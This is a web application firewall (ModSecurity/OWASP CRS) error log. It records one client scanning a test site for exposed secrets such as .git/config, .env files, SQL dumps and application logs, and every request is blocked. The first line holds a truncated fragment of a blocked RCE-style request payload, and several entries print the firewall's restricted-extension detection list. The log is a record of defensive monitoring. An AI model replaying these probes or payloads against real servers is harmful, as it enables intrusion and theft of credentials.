Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aWS2g04YgaRMJb38LtMjHQAAAAQ"]
[Mon Jan 12 09:53:23.842429 2026] [:error] [pid 1355927] [client 13.40.27.204:58662] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aWS2g04YgaRMJb38LtMjHQAAAAQ"]
[Mon Jan 12 09:53:23.842565 2026] [:error] [pid 1355927] [client 13.40.27.204:58662] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aWS2g04YgaRMJb38LtMjHQAAAAQ"]
[Mon Jan 12 12:28:20.430719 2026] [:error] [pid 1356126] [client 13.40.27.204:41924] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWTa1Dv8xyMiuvwfNnljvAAAAAU"]
[Mon Jan 12 12:28:20.430960 2026] [:error] [pid 1356126] [client 13.40.27.204:41924] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWTa1Dv8xyMiuvwfNnljvAAAAAU"]
[Mon Jan 12 12:28:20.431135 2026] [:error] [pid 1356126] [client 13.40.27.204:41924] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aWTa1Dv8xyMiuvwfNnljvAAAAAU"]
[Mon Jan 12 12:28:20.533351 2026] [:error] [pid 1355923] [client 13.40.27.204:41956] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWTa1CE1xEBhFyXickXrcAAAAAA"]
[Mon Jan 12 12:28:20.533551 2026] [:error] [pid 1355923] [client 13.40.27.204:41956] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWTa1CE1xEBhFyXickXrcAAAAAA"]
[Mon Jan 12 12:28:20.533713 2026] [:error] [pid 1355923] [client 13.40.27.204:41956] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWTa1CE1xEBhFyXickXrcAAAAAA"]
[Mon Jan 12 12:28:20.735596 2026] [:error] [pid 1362233] [client 13.40.27.204:42022] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWTa1H2DuVtAKraH1YONZAAAAAk"]
[Mon Jan 12 12:28:20.735902 2026] [:error] [pid 1362233] [client 13.40.27.204:42022] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWTa1H2DuVtAKraH1YONZAAAAAk"]
[Mon Jan 12 12:28:20.736065 2026] [:error] [pid 1362233] [client 13.40.27.204:42022] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "aWTa1H2DuVtAKraH1YONZAAAAAk"]
[Mon Jan 12 12:28:20.840946 2026] [:error] [pid 1355925] [client 13.40.27.204:42042] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWTa1E7thAymmecRvtl0LAAAAAI"]
[Mon Jan 12 12:28:20.841256 2026] [:error] [pid 1355925] [client 13.40.27.204:42042] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWTa1E7thAymmecRvtl0LAAAAAI"]
[Mon Jan 12 12:28:20.841411 2026] [:error] [pid 1355925] [client 13.40.27.204:42042] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aWTa1E7thAymmecRvtl0LAAAAAI"]
[Mon Jan 12 12:28:20.945085 2026] [:error] [pid 1355924] [client 13.40.27.204:42064] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWTa1NIpinFXoPzDav5wUgAAAAE"]
[Mon Jan 12 12:28:20.945416 2026] [:error] [pid 1355924] [client 13.40.27.204:42064] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWTa1NIpinFXoPzDav5wUgAAAAE"]
[Mon Jan 12 12:28:20.945564 2026] [:error] [pid 1355924] [client 13.40.27.204:42064] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "aWTa1NIpinFXoPzDav5wUgAAAAE"]
[Mon Jan 12 12:28:21.055597 2026] [:error] [pid 1365300] [client 13.40.27.204:42102] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWTa1dlKlmIJBGbQbR78QwAAAAs"]
[Mon Jan 12 12:28:21.055920 2026] [:error] [pid 1365300] [client 13.40.27.204:42102] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWTa1dlKlmIJBGbQbR78QwAAAAs"]
[Mon Jan 12 12:28:21.056067 2026] [:error] [pid 1365300] [client 13.40.27.204:42102] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aWTa1dlKlmIJBGbQbR78QwAAAAs"]
[Mon Jan 12 12:28:21.550159 2026] [:error] [pid 1355926] [client 13.40.27.204:42256] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWTa1cC2y5bYy1r2HoPzCAAAAAM"]
[Mon Jan 12 12:28:21.550508 2026] [:error] [pid 1355926] [client 13.40.27.204:42256] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWTa1cC2y5bYy1r2HoPzCAAAAAM"]
[Mon Jan 12 12:28:21.550674 2026] [:error] [pid 1355926] [client 13.40.27.204:42256] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/dump.sql"] [unique_id "aWTa1cC2y5bYy1r2HoPzCAAAAAM"]
[Mon Jan 12 12:28:21.761589 2026] [:error] [pid 1355925] [client 13.40.27.204:42318] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWTa1U7thAymmecRvtl0LQAAAAI"]
[Mon Jan 12 12:28:21.761811 2026] [:error] [pid 1355925] [client 13.40.27.204:42318] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWTa1U7thAymmecRvtl0LQAAAAI"]
[Mon Jan 12 12:28:21.761971 2026] [:error] [pid 1355925] [client 13.40.27.204:42318] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWTa1U7thAymmecRvtl0LQAAAAI"]
[Mon Jan 12 12:28:21.862863 2026] [:error] [pid 1355924] [client 13.40.27.204:42344] [client 13.40.27.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWTa1dIpinFXoPzDav5wUwAAAAE"]
[Mon Jan 12 12:28:21.863210 2026] [:error] [pid 1355924] [client 13.40.27.204:42344] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWTa1dIpinFXoPzDav5wUwAAAAE"]
[Mon Jan 12 12:28:21.863368 2026] [:error] [pid 1355924] [client 13.40.27.204:42344] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/log/error.log"] [unique_id "aWTa1dIpinFXoPzDav5wUwAAAAE"]
[Mon Jan 12 12:28:21.961500 2026] [:error] [pid 1365300] [client 13.40.27.204:42378] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWTa1dlKlmIJBGbQbR78RAAAAAs"]
[Mon Jan 12 12:28:21.961725 2026] [:error] [pid 1365300] [client 13.40.27.204:42378] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWTa1dlKlmIJBGbQbR78RAAAAAs"]
[Mon Jan 12 12:28:21.961892 2026] [:error] [pid 1365300] [client 13.40.27.204:42378] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWTa1dlKlmIJBGbQbR78RAAAAAs"]
[Mon Jan 12 12:28:22.383714 2026] [:error] [pid 1355923] [client 13.40.27.204:42498] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWTa1iE1xEBhFyXickXrcgAAAAA"]
[Mon Jan 12 12:28:22.383919 2026] [:error] [pid 1355923] [client 13.40.27.204:42498] [client 13.40.27.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWTa1iE1xEBhFyXickXrcgAAAAA"]
[Mon Jan 12 12:28:22.384073 2026] [:error] [pid 1355923] [client 13.40.27.204:42498] [client 13.40.27.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aWTa1iE1xEBhFyXickXrcgAAAAA"]
[Mon Jan 12 12:28:22.587404 2026] [:error] [pid 1362233] [client 13.40.27.204:42558] [client 13.40.27.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWTa1n2DuVtAKraH1YONZgAAAAk"]
